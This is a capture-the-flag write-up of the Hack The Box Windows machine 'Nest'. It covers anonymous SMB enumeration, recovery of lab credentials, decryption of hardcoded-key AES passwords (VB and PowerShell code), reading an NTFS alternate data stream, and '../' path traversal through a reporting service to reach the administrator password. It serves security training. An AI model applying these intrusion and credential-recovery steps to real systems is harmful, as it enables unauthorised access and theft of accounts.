Nest is a Windows machine rated easy/medium. Anonymous SMB access allows retrieving a first unprivileged account. Recovering an encrypted password together with the sources of a Visual Basic project leads to the decryption of a user's password. Privilege escalation goes through a "reporting" service that allows reading another encrypted string from the disk. Decrypting this last one gives administrator access.
Disclaimer: this is a rather quick presentation that deliberately omits the various research areas. Only the actual results and a quick approach are presented. Furthermore, I didn't have a lot of time to write and translate this write-up, so I used the deepl.com translator for some parts! I'm sorry if the English is not that good! :)
Discovery / Enumeration
A port scan gives us the services running on the machine.
```bash
$ sudo nmap -sS -p 0-10000 -T4 -sV -sC default -O -v -oN scan_nmap 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.030s latency).
Not shown: 9999 filtered ports
PORT     STATE SERVICE       VERSION
445/tcp  open  microsoft-ds?
4386/tcp open  unknown
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
|     Reporting Service V1.2
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     Reporting Service V1.2
|     Unrecognised command
|   Help:
|     Reporting Service V1.2
|     This service allows users to run queries against databases using the legacy HQK format
|     AVAILABLE COMMANDS ---
|     LIST
|     SETDIR <Directory_Name>
|     RUNQUERY <Query_ID>
|     DEBUG <Password>
|_    HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.70%I=7%D=2/23%Time=5E52D49C%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionReq,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21,"\r\nH
SF:QK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,"\r\nHQ
SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\
SF:r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n
SF:>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\
SF:n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n
SF:>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\
SF:r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Reporting
SF:\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20Reporti
SF:ng\x20Service\x20V1\.2\r\n\r\n>")%r(NCP,21,"\r\nHQK\x20Reporting\x20Ser
SF:vice\x20V1\.2\r\n\r\n>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.473 days (since Sat Feb 22 09:20:24 2020)
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental

Host script results:
|_clock-skew: mean: 1m52s, deviation: 0s, median: 1m52s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-23 20:42:32
|_  start_date: 2020-02-22 09:23:12

NSE: Script Post-scanning.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1012.52 seconds
           Raw packets sent: 30720 (1.357MB) | Rcvd: 663 (31.066KB)
```
The scan reveals that 2 ports are open: the classic 445 (SMB), and 4386, which appears to be a "Reporting" service. Its banner, `HQK Reporting Service V1.2`, already lists the available commands, including a `DEBUG <Password>` one that we will come back to. Also worth noting in the script output: SMB signing is enabled but not required.
Anonymous SMB access and temporary account
For the first research, we can start with a service we already know: SMB shares. Thanks to an anonymous (null) session, we are able to list the shares.
```bash
$ smbclient -U "" -L \\\\10.10.10.178
Unable to initialize messaging context
Enter WORKGROUP\'s password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        Data            Disk
        IPC$            IPC       Remote IPC
        Secure$         Disk
        Users           Disk
SMB1 disabled -- no workgroup available
```
3 shares are interesting for the moment:

- Data
- Secure$
- Users
We start by looking at the `Users` share, which among other things gives us the list of users on the machine. Useful!
```bash
$ smbclient -U "" \\\\10.10.10.178\\Users
Unable to initialize messaging context
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jan 26 00:04:21 2020
  ..                                  D        0  Sun Jan 26 00:04:21 2020
  Administrator                       D        0  Fri Aug  9 17:08:23 2019
  C.Smith                             D        0  Sun Jan 26 08:21:44 2020
  L.Frost                             D        0  Thu Aug  8 19:03:01 2019
  R.Thompson                          D        0  Thu Aug  8 19:02:50 2019
  TempUser                            D        0  Thu Aug  8 00:55:56 2019

                10485247 blocks of size 4096. 6545336 blocks available
```
Being curious, we can try the `Secure$` share. But the name is accurate: this one is more secure, and we can't list it without a user account.
```bash
$ smbclient -U "" \\\\10.10.10.178\\Secure$
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
```
Last unexplored path, the `Data` share. We can see several things.
```bash
$ smbclient -U "" \\\\10.10.10.178\\Data
Unable to initialize messaging context
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 00:53:46 2019
  ..                                  D        0  Thu Aug  8 00:53:46 2019
  IT                                  D        0  Thu Aug  8 00:58:07 2019
  Production                          D        0  Mon Aug  5 23:53:38 2019
  Reports                             D        0  Mon Aug  5 23:53:44 2019
  Shared                              D        0  Wed Aug  7 21:07:51 2019

                10485247 blocks of size 4096. 6545336 blocks available
```
After some searching, we quickly come across a "Welcome Email" text file. This type of file can be very interesting because it often contains information such as default accounts.
```bash
smb: \Shared\Templates\HR\> ls
  .                                   D        0  Wed Aug  7 21:08:01 2019
  ..                                  D        0  Wed Aug  7 21:08:01 2019
  Welcome Email.txt                   A      425  Thu Aug  8 00:55:36 2019

                10485247 blocks of size 4096. 6545577 blocks available
smb: \Shared\Templates\HR\> get "Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
```
By retrieving this file, we get our first real foothold: a user account!
```bash
$ cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>

You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>

If you have any issues accessing specific services or workstations, please inform the IT department and use the credentials below until all systems have been set up for you.

Username: TempUser
Password: welcome2019

Thank you
HR
```

We then try to log in to the `Secure$` share using our new account and boom, it is now within reach.

```bash
$ smbclient -U "TempUser" \\\\10.10.10.178\\Secure$
Unable to initialize messaging context
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Aug  8 01:08:12 2019
  ..                                  D        0  Thu Aug  8 01:08:12 2019
  Finance                             D        0  Wed Aug  7 21:40:13 2019
  HR                                  D        0  Thu Aug  8 01:08:11 2019
  IT                                  D        0  Thu Aug  8 12:59:25 2019
```
Enumeration and gathering the VB project
Here begins a new enumeration phase. Indeed, all the elements that were not previously accessible have to be analyzed, looking for new information.
This includes the `IT` directory of the `Data` share, which was not accessible before.
```bash
$ smbclient -U "TempUser" \\\\10.10.10.178\\Data
Enter WORKGROUP\TempUser's password:
Try "help" to get a list of possible commands.
smb: \> cd IT
smb: \IT\> ls
  .                                   D        0  Thu Aug  8 00:58:07 2019
  ..                                  D        0  Thu Aug  8 00:58:07 2019
  Archive                             D        0  Tue Aug  6 00:33:58 2019
  Configs                             D        0  Thu Aug  8 00:59:34 2019
  Installs                            D        0  Thu Aug  8 00:08:30 2019
  Reports                             D        0  Sun Jan 26 01:09:13 2020
  Tools                               D        0  Tue Aug  6 00:33:43 2019

                10485247 blocks of size 4096. 6545577 blocks available
smb: \IT\> cd
```
Using the same method as for the welcome email, we quickly find an interesting file in one of the configuration folders, which seems to be used by a project called "RU Scanner".
```bash
smb: \IT\Configs\Ru Scanner\> ls
  .                                   D        0  Wed Aug  7 22:01:13 2019
  ..                                  D        0  Wed Aug  7 22:01:13 2019
  RU_config.xml                       A      270  Thu Aug  8 21:49:37 2019

                10485247 blocks of size 4096. 6545577 blocks available
```

```bash
$ cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Port>389</Port>
  <Username>c.smith</Username>
  <Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
```
A user! The password here is encrypted, but no doubt we're on the right track. New mission: find the "RU Scanner" project. Indeed, if it consumes configuration files like this one, it must be able to decrypt the password, which means the key material is embedded somewhere in its code.
I didn't mention it at the beginning of the post, but this machine relies mainly on enumeration and information gathering. As always, when we can't move forward, we keep investigating the resources that are available. A good idea is to look at the other resources in the `Configs` directory. There is, for example, a configuration for the Notepad++ software.
```bash
smb: \IT\Configs\NotepadPlusPlus\> ls
  .                                   D        0  Wed Aug  7 21:31:37 2019
  ..                                  D        0  Wed Aug  7 21:31:37 2019
  config.xml                          A     6451  Thu Aug  8 01:01:25 2019
  shortcuts.xml                       A     2108  Wed Aug  7 21:30:27 2019

                10485247 blocks of size 4096. 6545509 blocks available
```
The recent-files history in `config.xml` reveals an absolute path to the personal files of the `Carl` user.

```xml
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
    <File filename="C:\windows\System32\drivers\etc\hosts" />
    <File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
    <File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
```
Even though we don't have permission to list the contents of the `IT` directory, it turns out that we can still go deeper in the tree if we know a valid path, which is exactly what we just found. This is standard Windows behaviour: NTFS checks the ACL of the object being opened rather than requiring list rights on every parent (the "Bypass traverse checking" privilege is granted to Everyone by default), so a known sub-path can be opened even when its parent cannot be listed. This way, we can sneak into the user's directory. :)
```bash
smb: \IT\Carl\> ls
  .                                   D        0  Wed Aug  7 21:42:14 2019
  ..                                  D        0  Wed Aug  7 21:42:14 2019
  Docs                                D        0  Wed Aug  7 21:44:00 2019
  Reports                             D        0  Tue Aug  6 15:45:40 2019
  VB Projects                         D        0  Tue Aug  6 16:41:55 2019

                10485247 blocks of size 4096. 6545509 blocks available
```
The `VB Projects` directory clearly shows the way. A few directories further on, we come across the famous RU Scanner project.
```bash
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls
  .                                   D        0  Thu Aug  8 00:05:54 2019
  ..                                  D        0  Thu Aug  8 00:05:54 2019
  bin                                 D        0  Wed Aug  7 22:00:11 2019
  ConfigFile.vb                       A      772  Thu Aug  8 00:05:09 2019
  Module1.vb                          A      279  Thu Aug  8 00:05:44 2019
  My Project                          D        0  Wed Aug  7 22:00:11 2019
  obj                                 D        0  Wed Aug  7 22:00:11 2019
  RU Scanner.vbproj                   A     4828  Fri Aug  9 17:37:51 2019
  RU Scanner.vbproj.user              A      143  Tue Aug  6 14:55:27 2019
  SsoIntegration.vb                   A      133  Thu Aug  8 00:05:58 2019
  Utils.vb                            A     4888  Wed Aug  7 21:49:35 2019

                10485247 blocks of size 4096. 6545509 blocks available
```
A small trick to download an entire folder with smbclient: clear the mask, enable recursion, disable the per-file prompt, then `mget` everything.
```bash
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mask ""
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> recurse ON
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> prompt OFF
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mget *
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as ConfigFile.vb (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
...
```
Decryption and user shell
Now that we have the source code of the VB project, the goal is to identify the parts of the code that perform the encryption/decryption of passwords. I won't go into the details of the code, but a `Decrypt` function can be identified quite easily.
It takes several parameters, including the encrypted password; the others (passphrase, salt, iteration count, IV and key size) are hardcoded alongside it, so nothing is missing to reproduce the decryption. If you don't have the environment needed to work with VB, there are several online services offering a simplified virtual environment.
This is notably the case of dotnetfiddle.com, which I used for this machine. So we extract the decryption function, call it from a simple module, and display the result.
```vb
Imports System
Imports System.Security.Cryptography
Imports System.Text

Public Module Module1
    Public Sub Main()
        Console.WriteLine("Hello World")
        Dim password As String
        ' Ciphertext from RU_config.xml; passphrase, salt, iteration count, IV and
        ' key size are the hardcoded values found in the project sources
        password = Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        Console.WriteLine(password)
    End Sub

    Public Function Decrypt(ByVal cipherText As String, _
                            ByVal passPhrase As String, _
                            ByVal saltValue As String, _
                            ByVal passwordIterations As Integer, _
                            ByVal initVector As String, _
                            ByVal keySize As Integer) _
                            As String
        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)
        ' PBKDF2 (HMAC-SHA1 by default in .NET) derives the AES key from the passphrase
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                               saltValueBytes, _
                                               passwordIterations)
        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))
        ' AES in CBC mode with the hardcoded ASCII IV
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)
        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)
        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)
        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)
        memoryStream.Close()
        cryptoStream.Close()
        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                             0, _
                                             decryptedByteCount)
        Return plainText
    End Function
End Module
```
We quickly get the desired result, the password!

```
Hello World
xRxRxPANCAK3SxRxRx
```
In particular, this gives us access to a new area, as well as the user flag!
```bash
$ smbclient -U "c.smith" \\\\10.10.10.178\\Users
Enter WORKGROUP\c.smith's password:
Try "help" to get a list of possible commands.
smb: \> cd C.Smith\
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 08:21:44 2020
  ..                                  D        0  Sun Jan 26 08:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 01:06:17 2019
  user.txt                            A       32  Fri Aug  9 01:05:24 2019

                10485247 blocks of size 4096. 6545509 blocks available
```
Getting the DEBUG password
New access = new enumeration phase.
`HQK Reporting` draws our attention. Remember, the same name appeared in the banner on port 4386 during the nmap scan, so this must be related to the reporting service.
```bash
smb: \C.smith\HQK Reporting\> ls
  .                                   D        0  Fri Aug  9 01:06:17 2019
  ..                                  D        0  Fri Aug  9 01:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 14:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 01:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 01:09:05 2019

                10485247 blocks of size 4096. 6544215 blocks available
```
During my first research on the machine, I tried to connect to the service and saw a debugging function requiring a password. Fortunately, the listing above mentions a `Debug Mode Password.txt` file. Only problem: the file seems empty (size 0)...
This is where a file system trick comes in: alternate data streams! On NTFS, a file's regular content lives in its default data stream (`::$DATA`), but a file can carry additional named streams. They were designed for metadata (summary information, the `Zone.Identifier` mark on downloaded files, etc.), but arbitrary data can be stored in one, and a normal directory listing only reports the size of the default stream, which is why the file looks empty.
With smbclient, you can see the streams of a file with the `allinfo` command.
```bash
smb: \C.smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Fri Aug  9 01:06:12 AM 2019 CEST
access_time:    Fri Aug  9 01:06:12 AM 2019 CEST
write_time:     Fri Aug  9 01:08:17 AM 2019 CEST
change_time:    Fri Aug  9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
```
We observe an interesting element: the default stream (`::$DATA`) is indeed empty, but a second stream named `Password` has been created!
smbclient also lets you download a file by specifying the desired stream, using the `file:stream:$DATA` syntax.
```bash
smb: \C.smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$Data"
getting file \C.smith\HQK Reporting\Debug Mode Password.txt:Password:$Data of size 15 as Debug Mode Password.txt:Password:$Data (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
$ cat Debug\ Mode\ Password.txt:Password:\$Data
WBQ201953D8w
```
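To see from the Windows side what smbclient's `allinfo` is reporting, here is an added example (not part of the original write-up) that reproduces the "0-byte file with a hidden stream" setup on a local NTFS volume, enumerates and reads the streams back, and then hunts for other alternate streams in a directory tree. It needs Windows PowerShell 5.1 or `pwsh` on Windows (the `-Stream` parameters only exist on the NTFS file system provider); the file name, the stream name and the stored value are constructed for the demonstration, and `Find-AlternateStream` is my own helper name.

```powershell
# Added example, not code from the original post. Windows/NTFS only.
$path = Join-Path $env:TEMP 'Debug Mode Password.txt'

# 1. An empty file: its default stream (::$DATA) is 0 bytes long
New-Item -Path $path -ItemType File -Force | Out-Null

# 2. Hide a value in a named alternate data stream called "Password"
Set-Content -Path $path -Stream 'Password' -Value 'example-only' -NoNewline

# 3. What every directory listing reports: only the default stream's size
"Length reported by Get-Item: $((Get-Item -Path $path).Length)"

# 4. Enumerate all streams on the file; ':$DATA' is the default one,
#    anything else is an alternate stream (same view as smbclient's allinfo)
Get-Item -Path $path -Stream * | Select-Object Stream, Length

# 5. Read the alternate stream directly (equivalent to
#    smbclient's get "Debug Mode Password.txt:Password:$Data")
Get-Content -Path $path -Stream 'Password'

# 6. Hunt for alternate streams across a tree. Zone.Identifier is the
#    "mark of the web" Windows adds to downloaded files and is usually noise.
function Find-AlternateStream {
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -Path $Root -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
        } |
        Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' } |
        Select-Object FileName, Stream, Length
}
Find-AlternateStream -Root $env:TEMP

Remove-Item -Path $path
```

From cmd.exe, `dir /r` gives the same per-file view. Two practical notes: streams survive a copy between NTFS volumes and over SMB (which is why smbclient can fetch one), but they are silently dropped when a file is copied to FAT/exFAT or packed into a zip archive, so a forensic copy of a suspicious file should be taken with a stream-aware tool; and a sweep like step 6 over user profiles is a cheap way to catch data hidden this way.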
Playing with the reporting service
The resolution of this machine continues with the second service identified during the port scan. We can connect to it with telnet (or `nc`).
```bash
$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
```
Now that we have the DEBUG password, we can start this mode and get access to more commands.
```
>DEBUG WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available

>HELP
This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
```
The `SERVICE` command tells us which binary is used and which account it runs as, while the `SESSION` command tells us the current directory.
```
>SERVICE

--- HQK REPORTING SERVER INFO ---

Version: 126.96.36.199
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES

>SESSION

--- Session Information ---

Session ID: 32315e55-e64a-4b71-bf3f-124285e93ede
Debug: True
Started At: 3/29/2020 11:55:33 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.14.4:34380
Current Query Directory: C:\Program Files\HQK\ALL QUERIES
```
Next, the `SETDIR`, `LIST` and `SHOWQUERY` commands come into play. In fact, they can be used to browse the machine's filesystem: `SETDIR` accepts the classic `../` path traversal, so we are not confined to the initial query directory, and `SHOWQUERY` prints the content of any listed file, within the limits of what the `Service_HQK` account is allowed to read.
```
>SETDIR ../
Current directory set to HQK

>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
       HqkSvc.exe
       HqkSvc.InstallState
       HQK_Config.xml

Current Directory: HQK
```
The `LDAP` and `Logs` directories catch our attention. The `LDAP` directory is where we find what we are looking for.
```
>SETDIR LDAP
Current directory set to LDAP

>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

       HqkLdap.exe
       Ldap.conf

Current Directory: LDAP
```
Displaying the `Ldap.conf` file with `SHOWQUERY` reveals the desired information, including the encrypted password of the administrator!
```
>SHOWQUERY 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
```
Decryption vol.2 and privilege escalation
Okay, we now have an encrypted password for the privileged account! This configuration seems to be consumed directly by the `HqkLdap.exe` binary sitting next to it, which performs the administrator authentication against LDAP. So we are going to have to look at that binary.
We start by retrieving it locally.
Once this is done, we can decompile the binary. I used dnSpy for this. I also skip the analysis here, but we quickly find the decryption function. It is identical to the one previously identified for the user part; only the hardcoded parameters (passphrase, salt, iteration count and IV) differ.
At this point, there are two options to decrypt the password:

- modify the binary code to display the decrypted password, then recompile and execute it;
- use our online environment again, changing the function parameters.
Not being very good with dnSpy and being a bit fed up with this machine, I took the easy way out by reusing the same thing as for the user :).
```vb
[...]
    Public Sub Main()
        Console.WriteLine("Hello World")
        Dim password As String
        ' Ciphertext from Ldap.conf; the other parameters are the hardcoded
        ' values recovered from HqkLdap.exe (same Decrypt signature as before)
        password = Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256)
        Console.WriteLine(password)
    End Sub
[...]
```
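Both decryptions on this page (the `c.smith` one from the RU Scanner sources and the Administrator one from `HqkLdap.exe`) are the same routine with different hardcoded parameters. Here is an added example, not the VB project's or HqkLdap's code, that reimplements it in PowerShell with the same .NET classes, so it runs on any Windows host or under `pwsh` without a VB toolchain. The function name `Invoke-HqkDecrypt` is my own; the ciphertexts and parameters are the ones shown above.

```powershell
# Added example, not code from the RU Scanner project or HqkLdap.exe.
# Same construction as the VB Decrypt(): PBKDF2 (Rfc2898DeriveBytes, which
# defaults to HMAC-SHA1 in .NET) stretches a passphrase into an AES key, then
# AES-CBC with PKCS7 padding and an ASCII IV decrypts the base64 blob.
function Invoke-HqkDecrypt {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$CipherText,        # base64 value from the config file
        [Parameter(Mandatory)][string]$PassPhrase,        # PBKDF2 passphrase, hardcoded in the binary
        [Parameter(Mandatory)][string]$SaltValue,         # PBKDF2 salt, used as ASCII bytes
        [Parameter(Mandatory)][int]$PasswordIterations,   # PBKDF2 iteration count
        [Parameter(Mandatory)][string]$InitVector,        # 16 ASCII chars = 16-byte AES IV
        [int]$KeySize = 256                               # AES key size in bits
    )

    $ivBytes     = [System.Text.Encoding]::ASCII.GetBytes($InitVector)
    $saltBytes   = [System.Text.Encoding]::ASCII.GetBytes($SaltValue)
    $cipherBytes = [Convert]::FromBase64String($CipherText)

    if ($ivBytes.Length -ne 16) {
        throw "AES-CBC needs a 16-byte IV, got $($ivBytes.Length) bytes"
    }
    if ($cipherBytes.Length -eq 0 -or ($cipherBytes.Length % 16) -ne 0) {
        throw "Ciphertext length ($($cipherBytes.Length)) is not a multiple of the AES block size"
    }

    $kdf = [System.Security.Cryptography.Rfc2898DeriveBytes]::new($PassPhrase, $saltBytes, $PasswordIterations)
    $aes = [System.Security.Cryptography.Aes]::Create()   # same algorithm as AesCryptoServiceProvider in the VB code
    try {
        $keyBytes    = $kdf.GetBytes([int]($KeySize / 8))
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $decryptor   = $aes.CreateDecryptor($keyBytes, $ivBytes)
        try {
            # TransformFinalBlock strips the PKCS7 padding and throws on a wrong key/IV
            $plainBytes = $decryptor.TransformFinalBlock($cipherBytes, 0, $cipherBytes.Length)
        } finally {
            $decryptor.Dispose()
        }
        return [System.Text.Encoding]::ASCII.GetString($plainBytes)
    } finally {
        $aes.Dispose()
        $kdf.Dispose()
    }
}

# c.smith: ciphertext from RU_config.xml, parameters from the RU Scanner sources
$ruScanner = @{
    CipherText         = 'fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE='
    PassPhrase         = 'N3st22'
    SaltValue          = '88552299'
    PasswordIterations = 2
    InitVector         = '464R5DFA5DL6LE28'
}
Invoke-HqkDecrypt @ruScanner

# Administrator: ciphertext from Ldap.conf, parameters recovered from HqkLdap.exe with dnSpy
$hqkLdap = @{
    CipherText         = 'yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4='
    PassPhrase         = '667912'
    SaltValue          = '1313Rf99'
    PasswordIterations = 3
    InitVector         = '1L1SA61493DRV53Z'
}
Invoke-HqkDecrypt @hqkLdap
```

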